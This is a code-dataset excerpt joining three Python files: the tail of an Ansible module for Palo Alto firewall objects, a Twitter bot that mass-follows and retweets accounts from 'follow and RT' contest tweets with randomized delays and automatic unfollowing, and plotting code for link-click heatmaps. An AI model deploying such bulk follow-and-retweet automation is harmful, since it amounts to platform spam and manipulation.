protocol=dict(default=None, choices=['tcp', 'udp']),
source_port=dict(default=None),
destination_port=dict(default=None),
services=dict(type='list', default=None),
description=dict(default=None),
tag_name=dict(default=None),
color=dict(default=None, choices=['red', 'green', 'blue', 'yellow', 'copper', 'orange', 'purple',
'gray', 'light green', 'cyan', 'light gray', 'blue gray',
'lime', 'black', 'gold', 'brown']),
vsys=dict(default='vsys1'),
devicegroup=dict(default=None),
commit=dict(type='bool', default=False),
)
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False,
required_one_of=[['api_key', 'password']],
mutually_exclusive=[['addressobject', 'addressgroup',
'serviceobject', 'servicegroup',
'tag_name']]
)
if not HAS_LIB:
module.fail_json(msg='Missing required libraries.')
ip_address = module.params["ip_address"]
password = module.params["password"]
username = module.params['username']
api_key = module.params['api_key']
operation = module.params['operation']
addressobject = module.params['addressobject']
addressgroup = module.params['addressgroup']
serviceobject = module.params['serviceobject']
servicegroup = module.params['servicegroup']
address = module.params['address']
address_type = module.params['address_type']
static_value = module.params['static_value']
dynamic_value = module.params['dynamic_value']
protocol = module.params['protocol']
source_port = module.params['source_port']
destination_port = module.params['destination_port']
services = module.params['services']
description = module.params['description']
tag_name = module.params['tag_name']
color = module.params['color']
vsys = module.params['vsys']
devicegroup = module.params['devicegroup']
commit = module.params['commit']
# Create the device with the appropriate pandevice type
device = PanDevice.create_from_device(ip_address, username, password, api_key=api_key)
# If Panorama, validate the devicegroup
dev_group = None
if hasattr(device, 'refresh_devices'):
# Panorama: set the device group.
if devicegroup == 'shared':
# Device group of None is "shared" scope for Panorama.
devicegroup = None
if devicegroup is not None:
dev_group = get_devicegroup(device, devicegroup)
if dev_group:
device.add(dev_group)
else:
module.fail_json(msg='\'%s\' device group not found in Panorama. Is the name correct?' % devicegroup)
else:
        # Firewall: set the targeted vsys.
device.vsys = vsys
# What type of object are we talking about?
if addressobject:
obj_name = addressobject
obj_type = objects.AddressObject
elif addressgroup:
obj_name = addressgroup
obj_type = objects.AddressGroup
elif serviceobject:
obj_name = serviceobject
obj_type = objects.ServiceObject
elif servicegroup:
obj_name = servicegroup
obj_type = objects.ServiceGroup
elif tag_name:
obj_name = tag_name
obj_type = objects.Tag
else:
module.fail_json(msg='No object type defined!')
# Which operation shall we perform on the object?
msg = None
if operation == "find":
# Search for the object
match = find_object(device, dev_group, obj_name, obj_type)
# If found, format and return the result
if match:
match_dict = xmltodict.parse(match.element_str())
module.exit_json(
stdout_lines=json.dumps(match_dict, indent=2),
msg='Object matched'
)
else:
module.fail_json(msg='Object \'%s\' not found. Is the name correct?' % obj_name)
elif operation == "delete":
# Search for the object
match = find_object(device, dev_group, obj_name, obj_type)
# If found, delete it
if match:
try:
match.delete()
except PanXapiError:
exc = get_exception()
module.fail_json(msg=exc.message)
msg = "Object '{0}' successfully deleted".format(obj_name)
else:
module.fail_json(msg='Object \'%s\' not found. Is the name correct?' % obj_name)
elif operation == "add":
# Search for the object. Fail if found.
match = find_object(device, dev_group, obj_name, obj_type)
if match:
module.fail_json(msg='Object \'%s\' already exists. Use operation: \'update\' to change it.' % obj_name)
else:
try:
new_object = create_object(
addressobject=addressobject,
addressgroup=addressgroup,
serviceobject=serviceobject,
servicegroup=servicegroup,
address=address,
address_type=address_type,
static_value=static_value,
dynamic_value=dynamic_value,
protocol=protocol,
source_port=source_port,
destination_port=destination_port,
services=services,
description=description,
tag_name=tag_name,
color=color
)
changed = add_object(device, dev_group, new_object)
except PanXapiError:
exc = get_exception()
module.fail_json(msg=exc.message)
msg = "Object '{0}' successfully added".format(obj_name)
elif operation == "update":
# Search for the object. Update if found.
match = find_object(device, dev_group, obj_name, obj_type)
if match:
try:
new_object = create_object(
addressobject=addressobject,
addressgroup=addressgroup,
serviceobject=serviceobject,
servicegroup=servicegroup,
address=address,
address_type=address_type,
static_value=static_value,
dynamic_value=dynamic_value,
protocol=protocol,
source_port=source_port,
destination_port=destination_port,
services=services,
description=description,
tag_name=tag_name,
color=color
)
changed = add_object(device, dev_group, new_object)
except PanXapiError:
exc = get_exception()
module.fail_json(msg=exc.message)
msg = "Object '{0}' successfully updated.".format(obj_name)
else:
module.fail_json(msg='Object \'%s\' does not exist. Use operation: \'add\' to add it.' % obj_name)
# Optional: commit the change.
if commit:
try:
device.commit(sync=True)
except PanDeviceError as e:
module.fail_json(msg='Failed to commit: {0}'.format(e))
# Done.
module.exit_json(changed=True, msg=msg)
if __name__ == '__main__':
main()
| isc | 49,532,090,653,482,990 | 34.418511 | 118 | 0.589104 | false |
svenrdz/bot_twitter | autofollowrt/autofollowrt.py | 1 | 21724 | # -*- coding: utf-8 -*-
# native imports
import os
import re
import sys
import copy
import time
import pickle
import random
from threading import Thread, RLock
from multiprocessing import Queue
# external imports
# Twitter package: https://pypi.python.org/pypi/twitter
# Homepage of Twitter package: http://mike.verdone.ca/twitter/
try:
import twitter
IMPTWITTER = True
except ImportError:
print(u"WARNING from AutoFollowRT: Could not load the 'twitter' library, so Twitter functionality is not available.")
IMPTWITTER = False
reload(sys)
sys.setdefaultencoding('utf-8')
class AutoFollowRT():
"""
Class for managing a twitter account.
"""
def __init__(self):
"""
Initialises the bot.
"""
# # # # #
# DATA
self._to_follow = []
self._to_rt = []
self._following = []
self._to_follow_count = 0
self._to_rt_count = 0
self._following_count = 0
# # # # #
# TWITTER
# Starting value for the Twitter and TwitterStream instances
self._t = None
self._ts = None
# Create locks for these instances, so they won't be accessed at the
# same time by different threads.
self._tlock = RLock()
self._tslock = RLock()
# Rate limiting variables
self._requests_max = 15
self._requests_count = 0
self._unfollow_requests = 0
# Start the threads
self._track_enable = False
self._follow_rt_enable = False
if IMPTWITTER:
self._trackthreadlives = True
self._trackthread = Thread(target=self._tracking)
self._trackthread.daemon = True
self._trackthread.name = u'word_tracker'
self._trackthread.start()
self._followrtthreadlives = True
self._followrtthread = Thread(target=self._follow_rt)
self._followrtthread.daemon = True
self._followrtthread.name = u'follow_rt'
self._followrtthread.start()
else:
self._trackthreadlives = False
self._followrtthreadlives = False
# Create a Boolean that indicates whether the bot is logged in, and
# a placeholder for the credentials of the user that is logged in
self._loggedin = False
# Parameters
self._config = {u'lang': 'fr',
u'min_delay': 0,
u'max_delay': 0,
u'avoid_users': [],
u'avoid_words': [],
u'reload_every_min': 60,
u'max_follow': 1000,
u'unfollow_threshold': 200}
def setup(self):
"""
Reads the config.txt file that has to be filled with desired parameters
"""
# Prepares the bot on first use (or if txt files have been deleted)
self._first_launch()
# Load config.txt file
file = "config.txt"
with open(file, "r") as config:
for line in config:
if line.startswith('#') or line.endswith('****'):
continue
line = line.split(' = ')
if len(line) < 2:
continue
parameter = line[0].decode('utf-8').strip()
value = line[1].decode('utf-8').strip()
if parameter == u'words':
value = ','.join([word.strip()
for word in value.split(',')])
elif parameter in [u'follow_words',
u'rt_words',
u'avoid_words',
u'avoid_users']:
value = [word.strip() for word in value.split(',')]
elif parameter in [u'min_delay',
u'max_delay',
u'reload_every_min',
u'max_follow',
u'unfollow_threshold']:
value = int(value)
self._config[parameter] = value
missing_params = []
required_params = [u'user',
u'cons_key',
u'cons_secret',
u'access_token',
u'access_token_secret',
u'words',
u'follow_words',
u'rt_words']
for param in required_params:
if param not in self._config:
missing_params.append(param)
if len(missing_params) > 0:
self._error(u'setup',
u"Please add {} to config.txt file.".format(", ".join(param for param in missing_params).encode('utf-8')))
# Load to_follow.txt file
file = "to_follow.txt"
with open(file, 'r') as f:
for line in f:
self._to_follow.append(line.decode('utf-8').strip())
self._to_follow_count = len(self._to_follow)
# Load to_retweet.txt file
file = "to_retweet.txt"
with open(file, 'r') as f:
for line in f:
self._to_rt.append(line.decode('utf-8').strip())
self._to_rt_count = len(self._to_rt)
# Load following.txt file
file = "following.txt"
with open(file, 'r') as f:
for line in f:
self._following.append(line.decode('utf-8').strip())
self._following_count = len(self._following)
self._message(u'setup',
u"Done.")
def login(self):
"""
Logs in to Twitter, using the provided access keys. You can get
these for your own Twitter account at apps.twitter.com
"""
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'login',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Log in to a Twitter account
self._oauth = twitter.OAuth(self._config[u'access_token'],
self._config[u'access_token_secret'],
self._config[u'cons_key'],
self._config[u'cons_secret'])
self._t = twitter.Twitter(auth=self._oauth)
self._ts = twitter.TwitterStream(auth=self._oauth)
try:
self._t.search.tweets(q='bonjour', count=1)
except twitter.TwitterHTTPError:
self._error(u'login',
u"Could not login. Please verify OAuth keys in config.txt")
self._loggedin = True
self._message(u'login',
u"Done.")
def start_tracking(self):
"""
Starts the thread for tracking
"""
# Start thread
self._track_enable = True
self._message(u'start_tracking',
u"Tracking Stream for {} initialized.".format(self._config[u'words']).encode('utf-8'))
def start_follow_rt(self):
"""
Starts the thread for following/retweeting
"""
self._requests_count = 0
self._set_number_unfollow_per_block()
# Start thread
time.sleep(5)
self._follow_rt_enable = True
self._message(u'start_follow_rt',
u"New 15-minute block for following/retweeting")
def stop_tracking(self):
"""
Stops the thread for tracking
"""
# Stop thread
self._track_enable = False
def stop_follow_rt(self):
"""
Stops the thread for following/retweeting
"""
# Stop thread
self._follow_rt_enable = False
def _tracking(self):
"""
Thread : select candidate tweets
"""
while self._trackthreadlives:
time.sleep(1)
while self._loggedin and self._track_enable:
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'_tracking',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Open stream and track the chosen words
with self._tslock:
search = self._ts.statuses.filter(track=self._config[u'words'],
language=self._config[u'lang'])
for tweet in search:
# Reconnect whenever a hangup shows up from twitter API
if 'hangup' in tweet.keys():
self._reconnect()
continue
# to avoid failing
if u'text' not in tweet.keys():
continue
# Get info on current tweet
text = tweet[u'text'].decode('utf-8').lower()
tokens = re.sub("[^\w]", " ", text).split()
username = tweet[u'user'][u'screen_name'].decode('utf-8')
# Routine checks :
# Avoid some users
if username in self._config[u'avoid_users']:
continue
# Avoid some words
if any(x in tokens for x in self._config[u'avoid_words']):
continue
# Tweet does not start with 'RT @'
if text.startswith('rt @') or tweet['retweeted']:
continue
# Tweet contains at least one follow_word and one rt_word
if any(x in tokens for x in self._config[u'rt_words']) and any(x in tokens for x in self._config[u'follow_words']):
self._process_tweet(tweet)
def _process_tweet(self, tweet):
"""
Processes the tweet found by tracking function
"""
# Read the tweet
text = tweet[u'text'].decode('utf-8')
tweet_id = tweet[u'id']
username = tweet[u'user'][u'screen_name'].decode('utf-8')
to_follow = [username]
# Find accounts to be followed (assume every @user has to be)
for word in text.split():
if word[0] == '@' and word[1:] != username:
to_follow.append(word[1:])
# Follow and retweet
self._follow_later(to_follow)
self._retweet_later(tweet_id)
self._message(u'_process_tweet',
u"{} : {}\n{}\n".format(username, tweet_id, text).encode('utf-8'))
def _follow_later(self, to_follow):
"""
Saves the ids of the people to follow later in a txt file.
"""
user_ids = self._get_user_id(to_follow)
new_users = []
for user in set(user_ids) - set(self._to_follow):
self._to_follow.append(user)
new_users.append(user)
self._to_follow_count = len(self._to_follow)
file = "to_follow.txt"
with open(file, 'a') as f:
for user in new_users:
f.write("{}\n".format(user).encode('utf-8'))
def _retweet_later(self, to_retweet):
"""
Saves the ids of the tweets to retweet later in a txt file.
"""
self._to_rt.append(to_retweet)
self._to_rt_count = len(self._to_rt)
file = "to_retweet.txt"
with open(file, 'a') as f:
f.write("{}\n".format(to_retweet).encode('utf-8'))
def _follow_rt(self):
"""
Thread : manage follows and retweets
"""
while self._followrtthreadlives:
time.sleep(1)
while self._loggedin and self._follow_rt_enable and self._requests_count < self._requests_max:
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'_follow_rt',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
try:
ratio_follow_per_rt = int(
round(self._to_follow_count / float(self._to_rt_count)))
except ZeroDivisionError:
ratio_follow_per_rt = 2
if ratio_follow_per_rt < 2:
ratio_follow_per_rt = 2
time.sleep(self._wait())
if self._following_count >= self._config['max_follow']:
self._unfollow_oldest()
else:
if self._to_follow_count > 0 and self._to_rt_count > 0:
if self._requests_count % ratio_follow_per_rt == 0:
self._rt_next_tweet()
else:
self._follow_next_user()
elif self._to_follow_count > 0 and self._to_rt_count == 0:
self._follow_next_user()
elif self._to_rt_count > 0 and self._to_follow_count == 0:
self._rt_next_tweet()
elif self._to_follow_count == 0 and self._to_rt_count == 0:
if self._unfollow_requests > 0:
self._unfollow_oldest()
self._unfollow_requests -= 1
def _follow_next_user(self):
"""
Follows the first user in to_follow.txt and erase it from the file
if it is a success.
"""
user_to_follow = self._to_follow[0]
followed = False
if user_to_follow not in self._following:
with self._tlock:
try:
self._t.friendships.create(user_id=user_to_follow)
followed = True
except:
self._message(u'_follow_next_user',
u"Could not follow user {}".format(user_to_follow).encode('utf-8'))
self._following.append(user_to_follow)
self._following_count = len(self._following)
self._requests_count += 1
else:
idx = self._following.index(user_to_follow)
self._following.append(self._following.pop(idx))
self._to_follow.pop(0)
self._to_follow_count = len(self._to_follow)
file = "to_follow.txt"
with open(file, 'w') as f:
for user in self._to_follow:
f.write("{}\n".format(user).encode('utf-8'))
file = "following.txt"
with open(file, 'w') as f:
for user in self._following:
f.write("{}\n".format(user).encode('utf-8'))
if followed:
self._message(u'_follow_next_user',
u"User {} was succesfully followed".format(user_to_follow).encode('utf-8'))
def _rt_next_tweet(self):
"""
Retweets the first tweet in to_retweet.txt and erase it from the
file if it is a success.
"""
tweet_to_rt = self._to_rt[0]
with self._tlock:
try:
self._t.statuses.retweet(id=tweet_to_rt)
retweeted = True
except:
retweeted = False
self._to_rt.pop(0)
# Update class variables
self._requests_count += 1
self._to_rt_count = len(self._to_rt)
if retweeted:
file = "to_retweet.txt"
with open(file, 'w') as f:
for tweet in self._to_rt:
f.write("{}\n".format(tweet).encode('utf-8'))
self._message(u'_rt_next_tweet',
u"Tweet {} was succesfully retweeted".format(tweet_to_rt).encode('utf-8'))
else:
self._message(u'_rt_next_tweet',
u"Could not retweet {}".format(tweet_to_rt).encode('utf-8'))
def _unfollow_oldest(self):
"""
Unfollows the oldest followed user in the list
"""
user_to_follow = self._following[0]
with self._tlock:
try:
self._t.friendships.destroy(user_id=user_to_follow)
except:
self._message(u'_unfollow_oldest',
u"Could not unfollow user {}".format(user_to_follow).encode('utf-8'))
self._following.pop(0)
self._following_count = len(self._following)
self._requests_count += 1
file = "following.txt"
with open(file, 'w') as f:
for user in self._following:
f.write("{}\n".format(user).encode('utf-8'))
self._message(u'_unfollow_oldest',
u"User {} was succesfully unfollowed".format(user_to_follow).encode('utf-8'))
def _get_user_id(self, screen_names):
"""
Returns user id from user(s) with the screen_name(s) in input.
"""
screen_names_str = ','.join(screen_names).encode('utf-8')
with self._tlock:
users = self._t.users.lookup(screen_name=screen_names_str)
user_ids = [users[i][u'id'] for i in range(len(users))]
return user_ids
def _save_following(self):
"""
        Saves the list of users the bot is currently following to
        following.txt
"""
file = "following.txt"
with open(file, 'w') as f:
for user in self._following:
f.write("{}\n".format(user).encode('utf-8'))
        self._message(u'_save_following',
u"Following list updated")
def _set_number_unfollow_per_block(self):
"""
Chooses a number of unfollow actions depending on parameters and
number of accounts currently following
"""
difference = (self._config['max_follow'] - self._config['unfollow_threshold']) / 3
th1 = self._config['unfollow_threshold']
th2 = self._config['unfollow_threshold'] + difference
th3 = self._config['unfollow_threshold'] + difference * 2
        if self._following_count > th3:
            self._unfollow_requests = 3
        elif self._following_count > th2:
            self._unfollow_requests = 2
        elif self._following_count > th1:
            self._unfollow_requests = 1
        else:
            self._unfollow_requests = 0
def _error(self, methodname, msg):
"""
Raises an Exception on behalf of the method involved.
Arguments
methodname - String indicating the name of the method that is
throwing the error.
message - String with the error message.
"""
raise Exception(
u"ERROR in AutoFollowRT.{}: {}".format(methodname, msg).encode('utf-8'))
def _message(self, methodname, msg):
"""
Prints a message on behalf of the method involved. Friendly
verion of self._error
Arguments
methodname - String indicating the name of the method that is
throwing the error.
message - String with the error message.
"""
print(u"AutoFollowRT.{}: {}".format(methodname, msg).encode('utf-8'))
print("-" * 12)
sys.stdout.flush()
def _reconnect(self):
"""
Logs in to Twitter, using the stored OAuth. This function is
intended for internal use, and should ONLY be called after
login has been called.
"""
# Report the reconnection attempt.
self._message(u'_reconnect',
u"Attempting to reconnect to Twitter.")
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'_reconnect',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Log in to a Twitter account
self._t = twitter.Twitter(auth=self._oauth)
self._ts = twitter.TwitterStream(auth=self._oauth)
try:
self._t.search.tweets(q='bonjour', count=1)
except twitter.TwitterHTTPError:
self._error(u'_reconnect',
u"Could not login. Please verify OAuth keys in config.txt")
self._loggedin = True
# Report the reconnection success.
self._message(u'_reconnect',
u"Successfully reconnected to Twitter!")
def _wait(self):
"""
        Returns a random delay (in seconds) between the user-configured
        min_delay and max_delay, used to wait before taking actions
"""
tmin, tmax = self._config[u'min_delay'], self._config[u'max_delay']
if tmin > tmax:
tmin, tmax = tmax, tmin
delay = random.randint(tmin, tmax)
return delay
def _first_launch(self):
"""
Creates the txt files that prepare the bot to work with the account
"""
file = "to_follow.txt"
if not os.path.isfile(file):
with open(file, 'w') as f:
pass
self._message(u'_first_launch',
u"{} was created".format(file).encode('utf-8'))
file = "to_retweet.txt"
if not os.path.isfile(file):
with open(file, 'w') as f:
pass
self._message(u'_first_launch',
u"{} was created".format(file).encode('utf-8'))
file = "following.txt"
if not os.path.isfile(file):
with open(file, 'w') as f:
pass
self._message(u'_first_launch',
u"{} was created".format(file).encode('utf-8'))
| gpl-3.0 | -6,055,042,456,488,697,000 | 33.537361 | 135 | 0.506997 | false |
linksuccess/linksuccess | parsingframework/heatmaps.py | 1 | 18035 | import numpy as np
import numpy.random
import matplotlib.pyplot as plt
import cPickle as pickle
import MySQLdb
from wsd.database import MySQLDatabase
import matplotlib.cm as cm
from matplotlib.colors import LogNorm, Normalize, BoundaryNorm, PowerNorm
from conf import *
from matplotlib import style
style.use('acm-3col')
import pylab
params = {
'font.family' : 'serif',
'font.serif' : ['Times New Roman'],
'font.size' : 7
}
pylab.rcParams.update(params)
def clicks_heatmap():
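    # Plot 2D histograms of click positions, with x normalized by a 1920px
    # viewport width and y by the page length. Clicks on links that occur only
    # once on a page are treated as "confident"; clicks on duplicated links
    # are down-weighted by the number of duplicates before being binned.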
print 'loading'
db = MySQLDatabase(DATABASE_HOST, DATABASE_USER, DATABASE_PASSWORD, DATABASE_NAME)
db_worker_view = db.get_work_view()
coords = db_worker_view.retrieve_all_links_coords_clicks()
print 'coord loaded'
links = {}
x = []
y = []
values = []
confident_values = []
not_confident_values = []
x_conf = []
y_conf = []
x_not_conf = []
y_not_conf = []
number_of_not_confident_clicks=0
number_of_confident_clicks = 0
number_of_valid_normed_links=0
for coord in coords:
        try:
            links[coord['key']] += 1
        except KeyError:
            links[coord['key']] = 0
for coord in coords:
x_normed = float(coord['x'])/float(1920)
y_normed = float(coord['y'])/float(coord['page_length'])
if x_normed <=1.0 and y_normed <=1.0:
x.append(x_normed)
y.append(y_normed)
number_of_valid_normed_links+=1
if links[coord['key']]==0:
x_conf.append(x_normed)
y_conf.append(y_normed)
values.append(float(coord['counts']))
number_of_confident_clicks+=1
confident_values.append(coord['counts'])
else:
x_not_conf.append(x_normed)
y_not_conf.append(y_normed)
values.append(float(coord['counts'])/float(links[coord['key']])+1.0)
number_of_not_confident_clicks+=1
not_confident_values.append(float(coord['counts'])/float(links[coord['key']]))
print '###########'
print sum(values)
print sum(confident_values)
print number_of_confident_clicks
print sum(not_confident_values)
print number_of_not_confident_clicks
print number_of_valid_normed_links
print len(coords)
print '###########'
heatmap, xedges, yedges = np.histogram2d(x_conf, y_conf, bins=100, weights=confident_values)
extent = [xedges[0], xedges[-1], yedges[-1], yedges[0] ]
fig_size = (2.4, 2)
#fig_size = (3.5, 3)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap, extent=extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Log Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_lognormed_self_loop_confident.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=Normalize(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_normed_self_loop_confident.pdf')
print "conf done"
heatmap, xedges, yedges = np.histogram2d(x_not_conf, y_not_conf, bins=100, weights=not_confident_values)
extent = [xedges[0], xedges[-1], yedges[-1], yedges[0] ]
fig_size = (2.4, 2)
#fig_size = (3.5, 3)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap, extent=extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Log Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_lognormed_self_loop_not_confident.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=Normalize(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_normed_self_loop_not_confident.pdf')
print " not conf done"
heatmap, xedges, yedges = np.histogram2d(x, y, bins=100, weights=values)
extent = [xedges[0], xedges[-1], yedges[-1], yedges[0] ]
fig_size = (2.4, 2)
#fig_size = (3.5, 3)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap, extent=extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Log Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_lognormed_self_loop_1.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=Normalize(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_normed_self_loop_1.pdf')
print "done"
def clicks_heatmap_first_occ():
print 'loading'
db = MySQLDatabase(DATABASE_HOST, DATABASE_USER, DATABASE_PASSWORD, DATABASE_NAME)
db_worker_view = db.get_work_view()
coords = db_worker_view.retrieve_all_links_coords_clicks_first_occ()
print 'coord loaded'
links = {}
x = []
y = []
values = []
for link in coords.values():
x_normed = float(link['x'])/float(1920)
y_normed = float(link['y'])/float(link['page_length'])
if x_normed <=1.0 and y_normed <=1.0:
x.append(x_normed)
y.append(y_normed)
values.append(float(link['counts']))
heatmap, xedges, yedges = np.histogram2d(x, y, bins=100, weights=values)
extent = [xedges[0], xedges[-1], yedges[-1], yedges[0] ]
fig_size = (2.4, 2)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Log Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_lognormed_self_loop_first_occ.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=Normalize(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_normed_self_loop_first_occ.pdf')
print "done"
def clicks_heatmap_total():
print 'loading'
db = MySQLDatabase(DATABASE_HOST, DATABASE_USER, DATABASE_PASSWORD, DATABASE_NAME)
db_worker_view = db.get_work_view()
coords = db_worker_view.retrieve_all_links_coords_clicks()
print 'coord loaded'
links = {}
x = []
y = []
values = []
for coord in coords:
x_normed = float(coord['x'])/float(1920)
y_normed = float(coord['y'])/float(coord['page_length'])
if x_normed <=1.0 and y_normed <=1.0:
x.append(x_normed)
y.append(y_normed)
values.append(float(coord['counts']))
heatmap, xedges, yedges = np.histogram2d(x, y, bins=100, weights=values)
extent = [xedges[0], xedges[-1], yedges[-1], yedges[0] ]
fig_size = (2.4, 2)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Log Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_lognormed_self_loop_total.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=Normalize(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_normed_self_loop_total.pdf')
print "done"
def links_heatmap():
#http://stackoverflow.com/questions/2369492/generate-a-heatmap-in-matplotlib-using-a-scatter-data-set
    # Load the on-page coordinates of all links from the database.
print 'loading'
db = MySQLDatabase(DATABASE_HOST, DATABASE_USER, DATABASE_PASSWORD, DATABASE_NAME)
db_worker_view = db.get_work_view()
coords = db_worker_view.retrieve_all_links_coords()
print 'coord loaded'
x=[]
y=[]
page_lenghts = db_worker_view.retrieve_all_page_lengths()
print 'lenghts loaded'
for coord in coords:
x_normed = float(coord['x'])/float(1920)
y_normed = float(coord['y'])/float(page_lenghts[coord['source_article_id']])
if x_normed <=1.0 and y_normed <=1.0:
x.append(x_normed)
y.append(y_normed)
heatmap, xedges, yedges = np.histogram2d(x, y, bins=100)
extent = [xedges[0], xedges[-1], yedges[-1], yedges[0]]
fig_size = (2.4, 2)
#fig_size = (3.5, 3)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap, extent=extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Log Normalized")
plt.show()
plt.savefig('output/links_heatmap_lognormed_self_loop.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=Normalize(),cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Normalized")
plt.show()
plt.savefig('output/links_heatmap_normed_self_loop.pdf')
print "done"
def multiple_links_heatmap():
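    # Plot separate link-position heatmaps for links that occur exactly once
    # on their source page ("unique") and for links that occur multiple times
    # ("multiple"), using the same normalized x/y coordinates as above.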
print 'loading'
db = MySQLDatabase(DATABASE_HOST, DATABASE_USER, DATABASE_PASSWORD, DATABASE_NAME)
db_worker_view = db.get_work_view()
coords = db_worker_view.retrieve_all_links_multpile_occ()
print 'coord loaded'
page_lenghts = db_worker_view.retrieve_all_page_lengths()
print 'lenghts loaded'
links = {}
x = []
y = []
x_conf = []
y_conf = []
x_not_conf = []
y_not_conf = []
number_of_not_confident_clicks=0
number_of_confident_clicks = 0
number_of_valid_normed_links=0
for coord in coords:
        try:
            links[coord['key']] += 1
        except KeyError:
            links[coord['key']] = 0
for coord in coords:
x_normed = float(coord['x'])/float(1920)
y_normed = float(coord['y'])/float(page_lenghts[coord['key'][0]])
if x_normed <=1.0 and y_normed <=1.0:
x.append(x_normed)
y.append(y_normed)
number_of_valid_normed_links+=1
if links[coord['key']]==0:
x_conf.append(x_normed)
y_conf.append(y_normed)
number_of_confident_clicks+=1
else:
x_not_conf.append(x_normed)
y_not_conf.append(y_normed)
number_of_not_confident_clicks+=1
print '###########'
print number_of_confident_clicks
print number_of_not_confident_clicks
print number_of_valid_normed_links
print len(coords)
print '###########'
heatmap, xedges, yedges = np.histogram2d(x_conf, y_conf, bins=100)
extent = [xedges[0], xedges[-1], yedges[-1], yedges[0]]
fig_size = (2.4, 2)
#fig_size = (3.5, 3)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap, extent=extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Log Normalized")
plt.show()
plt.savefig('output/links_heatmap_lognormed_self_loop_unique.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=Normalize(),cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Normalized")
plt.show()
plt.savefig('output/links_heatmap_normed_self_loop_unique.pdf')
print "unique done"
heatmap, xedges, yedges = np.histogram2d(x_not_conf, y_not_conf, bins=100)
extent = [xedges[0], xedges[-1], yedges[-1], yedges[0]]
fig_size = (2.4, 2)
#fig_size = (3.5, 3)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap, extent=extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Log Normalized")
plt.show()
plt.savefig('output/links_heatmap_lognormed_self_loop_multiple.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=Normalize(),cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Normalized")
plt.show()
plt.savefig('output/links_heatmap_normed_self_loop_multiple.pdf')
print "done"
def links_heatmap_rel_prob():
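    # Compare where links are placed with where links are clicked: build
    # normalized 2D histograms for both, then plot their difference and their
    # element-wise ratio (clicks over links and links over clicks).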
#http://stackoverflow.com/questions/2369492/generate-a-heatmap-in-matplotlib-using-a-scatter-data-set
    # Load the on-page coordinates of all links from the database.
print 'loading'
db = MySQLDatabase(DATABASE_HOST, DATABASE_USER, DATABASE_PASSWORD, DATABASE_NAME)
db_worker_view = db.get_work_view()
